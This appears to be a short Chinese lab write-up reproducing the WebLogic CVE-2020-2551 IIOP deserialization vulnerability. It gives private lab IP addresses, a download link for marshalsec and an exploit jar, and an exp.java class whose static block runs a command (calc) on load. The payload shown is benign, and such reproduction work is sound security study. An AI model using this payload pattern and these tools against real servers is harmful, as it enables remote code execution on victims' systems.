Weblogic CVE-2020-2551漏洞复现
Weblogic IIOP 反序列化
漏洞原理
https://www.anquanke.com/post/id/199227#h3-7 https://www.cnblogs.com/tr1ple/p/12483235.html
漏洞复现
Weblogic CVE-2020-2551复现过程
靶机:windows7系统
IP地址:192.168.43.20
攻击机:windows10系统
IP地址:192.168.43.38
•工具下载地址https://pan.baidu.com/s/1N9oW3PtJJpkGC-W-LkgW9A 提取码:03vx
exp.java
marshalsec-0.0.3-SNAPSHOT-all.jar
weblogic_CVE_2020_2551.jar
-
exp.java源代码
import java.io.IOException;
public class exp {
static{
try {
java.lang.Runtime.getRuntime().exec(new String[]{"cmd","/c","calc"});
} catch (IOException e) {
e.printStackTrace();
}
}
public static void main(String[] args) {
}
}
本文始发于微信公众号(HACK学习呀):Weblogic CVE-2020-2551漏洞复现&CS实战利用
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论